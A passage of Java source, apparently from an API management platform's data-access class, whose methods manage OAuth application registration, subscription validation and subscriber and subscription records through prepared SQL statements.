forceCaseInsensitiveComparisons = false; private boolean multiGroupAppSharingEnabled = false; private static boolean initialAutoCommit = false; private final Object scopeMutex = new Object(); private ApiMgtDAO() { APIManagerConfiguration configuration = ServiceReferenceHolder.getInstance() .getAPIManagerConfigurationService().getAPIManagerConfiguration(); String caseSensitiveComparison = ServiceReferenceHolder.getInstance(). getAPIManagerConfigurationService().getAPIManagerConfiguration().getFirstProperty(APIConstants.API_STORE_FORCE_CI_COMPARISIONS); if (caseSensitiveComparison != null) { forceCaseInsensitiveComparisons = Boolean.parseBoolean(caseSensitiveComparison); } multiGroupAppSharingEnabled = APIUtil.isMultiGroupAppSharingEnabled(); } public List<String> getAPIVersionsMatchingApiName(String apiName, String username) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; List<String> versionList = new ArrayList<String>(); ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_VERSIONS_MATCHES_API_NAME_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiName); ps.setString(2, username); resultSet = ps.executeQuery(); while (resultSet.next()) { versionList.add(resultSet.getString("API_VERSION")); } } catch (SQLException e) { handleException("Failed to get API versions matches API name" + apiName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return versionList; } /** * Method to get the instance of the ApiMgtDAO. * * @return {@link ApiMgtDAO} instance */ public static ApiMgtDAO getInstance() { if (INSTANCE == null) { INSTANCE = new ApiMgtDAO(); } return INSTANCE; } /** * Persist the details of the token generation request (allowed domains & validity period) to be used back * when approval has been granted. * * @param dto DTO related to Application Registration. * @param onlyKeyMappingEntry When this flag is enabled, only AM_APPLICATION_KEY_MAPPING will get affected. * @throws APIManagementException if failed to create entries in AM_APPLICATION_REGISTRATION and * AM_APPLICATION_KEY_MAPPING tables. */ public void createApplicationRegistrationEntry(ApplicationRegistrationWorkflowDTO dto, boolean onlyKeyMappingEntry) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement queryPs = null; PreparedStatement appRegPs = null; ResultSet resultSet = null; Application application = dto.getApplication(); Subscriber subscriber = application.getSubscriber(); String jsonString = dto.getAppInfoDTO().getOAuthApplicationInfo().getJsonString(); String registrationQuery = SQLConstants.GET_APPLICATION_REGISTRATION_SQL; String registrationEntry = SQLConstants.ADD_APPLICATION_REGISTRATION_SQL; String keyMappingEntry = SQLConstants.ADD_APPLICATION_KEY_MAPPING_SQL; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); queryPs = conn.prepareStatement(registrationQuery); queryPs.setInt(1, subscriber.getId()); queryPs.setInt(2, application.getId()); queryPs.setString(3, dto.getKeyType()); resultSet = queryPs.executeQuery(); if (resultSet.next()) { throw new APIManagementException("Application '" + application.getName() + "' is already registered."); } if (!onlyKeyMappingEntry) { appRegPs = conn.prepareStatement(registrationEntry); appRegPs.setInt(1, subscriber.getId()); appRegPs.setString(2, dto.getWorkflowReference()); appRegPs.setInt(3, application.getId()); appRegPs.setString(4, dto.getKeyType()); appRegPs.setString(5, dto.getDomainList()); appRegPs.setLong(6, dto.getValidityTime()); appRegPs.setString(7, (String) dto.getAppInfoDTO().getOAuthApplicationInfo().getParameter("tokenScope")); appRegPs.setString(8, jsonString); appRegPs.execute(); } ps = conn.prepareStatement(keyMappingEntry); ps.setInt(1, application.getId()); ps.setString(2, dto.getKeyType()); ps.setString(3, dto.getStatus().toString()); ps.execute(); conn.commit(); } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on Application Registration", e1); } handleException("Error occurred while creating an " + "Application Registration Entry for Application : " + application.getName(), e); } finally { APIMgtDBUtil.closeStatement(queryPs); APIMgtDBUtil.closeStatement(appRegPs); APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } } public OAuthApplicationInfo getOAuthApplication(String consumerKey) throws APIManagementException { OAuthApplicationInfo oAuthApplicationInfo = new OAuthApplicationInfo(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_OAUTH_APPLICATION_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); rs = ps.executeQuery(); while (rs.next()) { oAuthApplicationInfo.setClientId(consumerKey); oAuthApplicationInfo.setCallBackURL(rs.getString("CALLBACK_URL")); oAuthApplicationInfo.setClientSecret(APIUtil.decryptToken(rs.getString("CONSUMER_SECRET"))); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_REDIRECT_URIS, rs.getString ("CALLBACK_URL")); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_CLIENT_NAME, rs.getString("APP_NAME")); oAuthApplicationInfo.addParameter(ApplicationConstants.OAUTH_CLIENT_GRANT, rs.getString("GRANT_TYPES")); } } catch (SQLException e) { handleException("Error while executing SQL for getting OAuth application info", e); } catch (CryptoException e) { handleException("Unable to decrypt consumer secret of consumer key " + consumerKey, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return oAuthApplicationInfo; } /** * Get the creator of the OAuth App. * * @param consumerKey Client ID of the OAuth App * @return {@code Subscriber} with name and TenantId set. * @throws APIManagementException */ public Subscriber getOwnerForConsumerApp(String consumerKey) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String username; Subscriber subscriber = null; String sqlQuery = SQLConstants.GET_OWNER_FOR_CONSUMER_APP_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, consumerKey); rs = ps.executeQuery(); while (rs.next()) { username = rs.getString("USERNAME"); String domainName = rs.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(username, domainName); subscriber = new Subscriber(endUsernameWithDomain); subscriber.setTenantId(rs.getInt("TENANT_ID")); } } catch (SQLException e) { handleException("Error while executing SQL for getting User Id : SQL " + sqlQuery, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return subscriber; } /** * Get Subscribed APIs for given userId * * @param userId id of the user * @return APIInfoDTO[] * @throws APIManagementException if failed to get Subscribed APIs */ public APIInfoDTO[] getSubscribedAPIsOfUser(String userId) throws APIManagementException { List<APIInfoDTO> apiInfoDTOList = new ArrayList<APIInfoDTO>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; //identify logged in user String loginUserName = getLoginUserName(userId); String tenantAwareUsername = MultitenantUtils.getTenantAwareUsername(loginUserName); int tenantId = APIUtil.getTenantId(loginUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_USER_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, tenantAwareUsername); ps.setInt(2, tenantId); rs = ps.executeQuery(); while (rs.next()) { APIInfoDTO infoDTO = new APIInfoDTO(); infoDTO.setProviderId(APIUtil.replaceEmailDomain(rs.getString("API_PROVIDER"))); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setVersion(rs.getString("API_VERSION")); apiInfoDTOList.add(infoDTO); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiInfoDTOList.toArray(new APIInfoDTO[apiInfoDTOList.size()]); } /** * Get API key information for given API * * @param apiInfoDTO API info * @return APIKeyInfoDTO[] * @throws APIManagementException if failed to get key info for given API */ public APIKeyInfoDTO[] getSubscribedUsersForAPI(APIInfoDTO apiInfoDTO) throws APIManagementException { APIKeyInfoDTO[] apiKeyInfoDTOs = null; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; List<APIKeyInfoDTO> apiKeyInfoList = new ArrayList<APIKeyInfoDTO>(); String sqlQuery = SQLConstants.GET_SUBSCRIBED_USERS_FOR_API_SQL; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(apiInfoDTO.getProviderId())); ps.setString(2, apiInfoDTO.getApiName()); ps.setString(3, apiInfoDTO.getVersion()); rs = ps.executeQuery(); while (rs.next()) { String userId = rs.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID); APIKeyInfoDTO apiKeyInfoDTO = new APIKeyInfoDTO(); apiKeyInfoDTO.setUserId(userId); apiKeyInfoList.add(apiKeyInfoDTO); } apiKeyInfoDTOs = apiKeyInfoList.toArray(new APIKeyInfoDTO[apiKeyInfoList.size()]); } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return apiKeyInfoDTOs; } /** * This method is to update the access token * * @param userId id of the user * @param apiInfoDTO Api info * @param statusEnum Status of the access key * @throws APIManagementException if failed to update the access token */ public void changeAccessTokenStatus(String userId, APIInfoDTO apiInfoDTO, String statusEnum) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; String tenantAwareUsername = MultitenantUtils.getTenantAwareUsername(userId); int tenantId = APIUtil.getTenantId(userId); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(userId, accessTokenStoreTable); String sqlQuery = SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_PREFIX + accessTokenStoreTable + SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_DEFAULT_SUFFIX; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_PREFIX + accessTokenStoreTable + SQLConstants.CHANGE_ACCESS_TOKEN_STATUS_CASE_INSENSITIVE_SUFFIX; } try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); ps = conn.prepareStatement(sqlQuery); ps.setString(1, statusEnum); ps.setString(2, tenantAwareUsername); ps.setInt(3, tenantId); ps.setString(4, APIUtil.replaceEmailDomainBack(apiInfoDTO.getProviderId())); ps.setString(5, apiInfoDTO.getApiName()); ps.setString(6, apiInfoDTO.getVersion()); int count = ps.executeUpdate(); if (log.isDebugEnabled()) { log.debug("Number of rows being updated : " + count); } conn.commit(); } catch (SQLException e) { try { if (conn != null) { conn.rollback(); } } catch (SQLException e1) { log.error("Failed to rollback the changeAccessTokenStatus operation", e1); } handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public boolean validateSubscriptionDetails(String context, String version, String consumerKey, APIKeyValidationInfoDTO infoDTO) throws APIManagementException { boolean defaultVersionInvoked = false; String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(context); if (apiTenantDomain == null) { apiTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } int apiOwnerTenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); //Check if the api version has been prefixed with _default_ if (version != null && version.startsWith(APIConstants.DEFAULT_VERSION_PREFIX)) { defaultVersionInvoked = true; //Remove the prefix from the version. version = version.split(APIConstants.DEFAULT_VERSION_PREFIX)[1]; } String sql; boolean isAdvancedThrottleEnabled = APIUtil.isAdvanceThrottlingEnabled(); if (!isAdvancedThrottleEnabled) { if (defaultVersionInvoked) { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } else { if (defaultVersionInvoked) { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); ps.setString(2, consumerKey); if (!isAdvancedThrottleEnabled) { if (!defaultVersionInvoked) { ps.setString(3, version); } } else { ps.setInt(3, apiOwnerTenantId); if (!defaultVersionInvoked) { ps.setString(4, version); } } rs = ps.executeQuery(); if (rs.next()) { String subscriptionStatus = rs.getString("SUB_STATUS"); String type = rs.getString("KEY_TYPE"); if (APIConstants.SubscriptionStatus.BLOCKED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setAuthorized(false); return false; } else if (APIConstants.SubscriptionStatus.ON_HOLD.equals(subscriptionStatus) || APIConstants .SubscriptionStatus.REJECTED.equals(subscriptionStatus)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.SUBSCRIPTION_INACTIVE); infoDTO.setAuthorized(false); return false; } else if (APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subscriptionStatus) && !APIConstants.API_KEY_TYPE_SANDBOX.equals(type)) { infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_BLOCKED); infoDTO.setType(type); infoDTO.setAuthorized(false); return false; } String tokenType = rs.getString("TOKEN_TYPE"); if (APIConstants.JWT.equals(tokenType)) { infoDTO.setAuthorized(false); return false; } String apiProvider = rs.getString("API_PROVIDER"); String subTier = rs.getString("TIER_ID"); String appTier = rs.getString("APPLICATION_TIER"); infoDTO.setTier(subTier); infoDTO.setSubscriber(rs.getString("USER_ID")); infoDTO.setApplicationId(rs.getString("APPLICATION_ID")); infoDTO.setApiName(rs.getString("API_NAME")); infoDTO.setApiPublisher(apiProvider); infoDTO.setApplicationName(rs.getString("NAME")); infoDTO.setApplicationTier(appTier); infoDTO.setType(type); //Advanced Level Throttling Related Properties if (APIUtil.isAdvanceThrottlingEnabled()) { String apiTier = rs.getString("API_TIER"); String subscriberUserId = rs.getString("USER_ID"); String subscriberTenant = MultitenantUtils.getTenantDomain(subscriberUserId); int apiId = rs.getInt("API_ID"); int subscriberTenantId = APIUtil.getTenantId(subscriberUserId); int apiTenantId = APIUtil.getTenantId(apiProvider); //TODO isContentAware boolean isContentAware = isAnyPolicyContentAware(conn, apiTier, appTier, subTier, subscriberTenantId, apiTenantId, apiId); infoDTO.setContentAware(isContentAware); //TODO this must implement as a part of throttling implementation. int spikeArrest = 0; String apiLevelThrottlingKey = "api_level_throttling_key"; if (rs.getInt("RATE_LIMIT_COUNT") > 0) { spikeArrest = rs.getInt("RATE_LIMIT_COUNT"); } String spikeArrestUnit = null; if (rs.getString("RATE_LIMIT_TIME_UNIT") != null) { spikeArrestUnit = rs.getString("RATE_LIMIT_TIME_UNIT"); } boolean stopOnQuotaReach = rs.getBoolean("STOP_ON_QUOTA_REACH"); List<String> list = new ArrayList<String>(); list.add(apiLevelThrottlingKey); infoDTO.setSpikeArrestLimit(spikeArrest); infoDTO.setSpikeArrestUnit(spikeArrestUnit); infoDTO.setStopOnQuotaReach(stopOnQuotaReach); infoDTO.setSubscriberTenantDomain(subscriberTenant); if (apiTier != null && apiTier.trim().length() > 0) { infoDTO.setApiTier(apiTier); } //We also need to set throttling data list associated with given API. This need to have policy id and // condition id list for all throttling tiers associated with this API. infoDTO.setThrottlingDataList(list); } return true; } infoDTO.setAuthorized(false); infoDTO.setValidationStatus(APIConstants.KeyValidationStatus.API_AUTH_RESOURCE_FORBIDDEN); } catch (SQLException e) { handleException("Exception occurred while validating Subscription.", e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return false; } private boolean isAnyPolicyContentAware(Connection conn, String apiPolicy, String appPolicy, String subPolicy, int subscriptionTenantId, int appTenantId, int apiId) throws APIManagementException { boolean isAnyContentAware = false; // only check if using CEP based throttling. ResultSet resultSet = null; PreparedStatement ps = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.IS_ANY_POLICY_CONTENT_AWARE_SQL; try { String dbProdName = conn.getMetaData().getDatabaseProductName(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, apiPolicy); ps.setInt(2, subscriptionTenantId); ps.setString(3, apiPolicy); ps.setInt(4, subscriptionTenantId); ps.setInt(5, apiId); ps.setInt(6, subscriptionTenantId); ps.setInt(7, apiId); ps.setInt(8, subscriptionTenantId); ps.setString(9, subPolicy); ps.setInt(10, subscriptionTenantId); ps.setString(11, appPolicy); ps.setInt(12, appTenantId); resultSet = ps.executeQuery(); // We only expect one result if all are not content aware. if (resultSet == null) { throw new APIManagementException(" Result set Null"); } int count = 0; if (resultSet.next()) { count = resultSet.getInt(1); if (count > 0) { isAnyContentAware = true; } } } catch (SQLException e) { handleException("Failed to get content awareness of the policies ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, resultSet); } return isAnyContentAware; } public void addSubscriber(Subscriber subscriber, String groupingId) throws APIManagementException { Connection conn = null; ResultSet rs = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.ADD_SUBSCRIBER_SQL; ps = conn.prepareStatement(query, new String[]{"subscriber_id"}); ps.setString(1, subscriber.getName()); ps.setInt(2, subscriber.getTenantId()); ps.setString(3, subscriber.getEmail()); Timestamp timestamp = new Timestamp(subscriber.getSubscribedDate().getTime()); ps.setTimestamp(4, timestamp); ps.setString(5, subscriber.getName()); ps.setTimestamp(6, timestamp); ps.setTimestamp(7, timestamp); ps.executeUpdate(); int subscriberId = 0; rs = ps.getGeneratedKeys(); if (rs.next()) { subscriberId = Integer.parseInt(rs.getString(1)); } subscriber.setId(subscriberId); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Error while rolling back the failed operation", e1); } } handleException("Error in adding new subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } } public void updateSubscriber(Subscriber subscriber) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String query = SQLConstants.UPDATE_SUBSCRIBER_SQL; ps = conn.prepareStatement(query); ps.setString(1, subscriber.getName()); ps.setInt(2, subscriber.getTenantId()); ps.setString(3, subscriber.getEmail()); ps.setTimestamp(4, new Timestamp(subscriber.getSubscribedDate().getTime())); ps.setString(5, subscriber.getName()); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.setInt(7, subscriber.getId()); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Error while rolling back the failed operation", e1); } } handleException("Error in updating subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public Subscriber getSubscriber(int subscriberId) throws APIManagementException { Connection conn = null; ResultSet rs = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_SUBSCRIBER_SQL; ps = conn.prepareStatement(query); ps.setInt(1, subscriberId); rs = ps.executeQuery(); if (rs.next()) { Subscriber subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setId(subscriberId); subscriber.setTenantId(rs.getInt("TENANT_ID")); subscriber.setEmail(rs.getString("EMAIL_ADDRESS")); subscriber.setSubscribedDate(new java.util.Date(rs.getTimestamp("DATE_SUBSCRIBED").getTime())); return subscriber; } } catch (SQLException e) { handleException("Error while retrieving subscriber: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return null; } public int addSubscription(APIIdentifier identifier, String context, int applicationId, String status, String subscriber) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForInsert = null; ResultSet rs = null; int subscriptionId = -1; int apiId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(identifier, conn); //Query to check if this subscription already exists String checkDuplicateQuery = SQLConstants.CHECK_EXISTING_SUBSCRIPTION_API_SQL; ps = conn.prepareStatement(checkDuplicateQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); //If the subscription already exists if (resultSet.next()) { String subStatus = resultSet.getString("SUB_STATUS"); String subCreationStatus = resultSet.getString("SUBS_CREATE_STATE"); String applicationName = getApplicationNameFromId(applicationId); if ((APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.ON_HOLD.equals(subStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subStatus)) && APIConstants.SubscriptionCreatedStatus.SUBSCRIBE.equals(subCreationStatus)) { //Throw error saying subscription already exists. log.error("Subscription already exists for API " + identifier.getApiName() + " in Application " + applicationName); throw new SubscriptionAlreadyExistingException("Subscription already exists for API " + identifier.getApiName() + " in Application " + applicationName); } else if (APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) && APIConstants .SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subCreationStatus)) { deleteSubscriptionByApiIDAndAppID(apiId, applicationId, conn); } else if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants .SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subStatus)) { log.error("Subscription to API " + identifier.getApiName() + " through application " + applicationName + " was blocked"); throw new APIManagementException("Subscription to API " + identifier.getApiName() + " through " + "application " + applicationName + " was blocked"); } } //This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.ADD_SUBSCRIPTION_SQL; //Adding data to the AM_SUBSCRIPTION table //ps = conn.prepareStatement(sqlQuery, Statement.RETURN_GENERATED_KEYS); preparedStForInsert = conn.prepareStatement(sqlQuery, new String[]{"SUBSCRIPTION_ID"}); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { preparedStForInsert = conn.prepareStatement(sqlQuery, new String[]{"subscription_id"}); } preparedStForInsert.setString(1, identifier.getTier()); preparedStForInsert.setInt(2, apiId); preparedStForInsert.setInt(3, applicationId); preparedStForInsert.setString(4, status != null ? status : APIConstants.SubscriptionStatus.UNBLOCKED); preparedStForInsert.setString(5, APIConstants.SubscriptionCreatedStatus.SUBSCRIBE); preparedStForInsert.setString(6, subscriber); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); preparedStForInsert.setTimestamp(7, timestamp); preparedStForInsert.setTimestamp(8, timestamp); preparedStForInsert.setString(9, UUID.randomUUID().toString()); preparedStForInsert.executeUpdate(); rs = preparedStForInsert.getGeneratedKeys(); while (rs.next()) { //subscriptionId = rs.getInt(1); subscriptionId = Integer.parseInt(rs.getString(1)); } // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForInsert, null, rs); } return subscriptionId; } public int addSubscription(APIProductIdentifier identifier, int applicationId, String status, String subscriber) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForInsert = null; ResultSet rs = null; int subscriptionId = -1; int apiProductId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String productName = identifier.getApiProductName(); String provider = identifier.getProviderName(); apiProductId = getAPIProductID(productName, provider, conn); // Query to check if this subscription already exists String checkDuplicateQuery = SQLConstants.CHECK_EXISTING_SUBSCRIPTION_PRODUCT_SQL; ps = conn.prepareStatement(checkDuplicateQuery); ps.setInt(1, apiProductId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); // If the subscription already exists if (resultSet.next()) { String subStatus = resultSet.getString("SUB_STATUS"); String subCreationStatus = resultSet.getString("SUBS_CREATE_STATE"); String applicationName = getApplicationNameFromId(applicationId); if ((APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.ON_HOLD.equals(subStatus) || APIConstants.SubscriptionStatus.REJECTED.equals(subStatus)) && APIConstants.SubscriptionCreatedStatus.SUBSCRIBE.equals(subCreationStatus)) { // Throw error saying subscription already exists. log.error("Subscription already exists for API Product " + productName + " in Application " + applicationName); throw new SubscriptionAlreadyExistingException("Subscription already exists for API Product " + productName + " in Application " + applicationName); } else if (APIConstants.SubscriptionStatus.UNBLOCKED.equals(subStatus) && APIConstants.SubscriptionCreatedStatus.UN_SUBSCRIBE.equals(subCreationStatus)) { deleteSubscriptionByApiProductIDAndAppID(apiProductId, applicationId, conn); } else if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus.PROD_ONLY_BLOCKED.equals(subStatus)) { log.error("Subscription to API Product " + productName + " through application " + applicationName + " was blocked"); throw new APIManagementException("Subscription to API Product " + productName + " through " + "application " + applicationName + " was blocked"); } } // This query to update the AM_SUBSCRIPTION table String sqlQuery = SQLConstants.ADD_PRODUCT_SUBSCRIPTION_SQL; // Adding data to the AM_SUBSCRIPTION table // ps = conn.prepareStatement(sqlQuery, Statement.RETURN_GENERATED_KEYS); preparedStForInsert = conn.prepareStatement(sqlQuery, new String[] { "SUBSCRIPTION_ID" }); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { preparedStForInsert = conn.prepareStatement(sqlQuery, new String[] { "subscription_id" }); } preparedStForInsert.setString(1, identifier.getTier()); preparedStForInsert.setInt(2, apiProductId); preparedStForInsert.setInt(3, applicationId); preparedStForInsert.setString(4, status != null ? status : APIConstants.SubscriptionStatus.UNBLOCKED); preparedStForInsert.setString(5, APIConstants.SubscriptionCreatedStatus.SUBSCRIBE); preparedStForInsert.setString(6, subscriber); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); preparedStForInsert.setTimestamp(7, timestamp); preparedStForInsert.setTimestamp(8, timestamp); preparedStForInsert.setString(9, UUID.randomUUID().toString()); preparedStForInsert.executeUpdate(); rs = preparedStForInsert.getGeneratedKeys(); while (rs.next()) { // subscriptionId = rs.getInt(1); subscriptionId = Integer.parseInt(rs.getString(1)); } // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add subscription ", e1); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForInsert, null, rs); } return subscriptionId; } /** * Removes the subscription entry from AM_SUBSCRIPTIONS for identifier. * * @param identifier APIIdentifier * @param applicationId ID of the application which has the subscription * @throws APIManagementException */ public void removeSubscription(APIIdentifier identifier, int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; int apiId = -1; String uuid; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(identifier, conn); String subscriptionUUIDQuery = SQLConstants.GET_SUBSCRIPTION_UUID_SQL; ps = conn.prepareStatement(subscriptionUUIDQuery); ps.setInt(1, apiId); ps.setInt(2, applicationId); resultSet = ps.executeQuery(); if (resultSet.next()) { uuid = resultSet.getString("UUID"); SubscribedAPI subscribedAPI = new SubscribedAPI(uuid); removeSubscription(subscribedAPI, conn); } else { throw new APIManagementException("UUID does not exist for the given apiId:" + apiId + " and " + "application id:" + applicationId); } conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException ex) { log.error("Failed to rollback the add subscription ", ex); } } handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } } /** * Removes a subscription specified by SubscribedAPI object * * @param subscription SubscribedAPI object * @param conn database connection object * @throws APIManagementException */ public void removeSubscription(SubscribedAPI subscription, Connection conn) throws APIManagementException { ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement preparedStForUpdateOrDelete = null; String subStatus = null; try { String subscriptionStatusQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_BY_UUID_SQL; ps = conn.prepareStatement(subscriptionStatusQuery); ps.setString(1, subscription.getUUID()); resultSet = ps.executeQuery(); if (resultSet.next()) { subStatus = resultSet.getString("SUB_STATUS"); } // If the user was unblocked, remove the entry from DB, else change the status and keep the entry. String updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_SQL; String deleteQuery = SQLConstants.REMOVE_SUBSCRIPTION_SQL; if (APIConstants.SubscriptionStatus.BLOCKED.equals(subStatus) || APIConstants.SubscriptionStatus .PROD_ONLY_BLOCKED.equals(subStatus)) { preparedStForUpdateOrDelete = conn.prepareStatement(updateQuery); preparedStForUpdateOrDelete.setString(1, subscription.getUUID()); } else { preparedStForUpdateOrDelete = conn.prepareStatement(deleteQuery); preparedStForUpdateOrDelete.setString(1, subscription.getUUID()); } preparedStForUpdateOrDelete.executeUpdate(); } catch (SQLException e) { log.error("Failed to add subscriber data ", e); handleException("Failed to add subscriber data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, resultSet); APIMgtDBUtil.closeAllConnections(preparedStForUpdateOrDelete, null, null); } } /** * Removes a subscription by id by force without considering the subscription blocking state of the user * * @param subscription_id id of subscription * @throws APIManagementException */ public void removeSubscriptionById(int subscription_id) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.REMOVE_SUBSCRIPTION_BY_ID_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, subscription_id); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback remove subscription ", e1); } } handleException("Failed to remove subscription data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public void removeAllSubscriptions(APIIdentifier apiIdentifier) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; int apiId; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); apiId = getAPIID(apiIdentifier, conn); String sqlQuery = 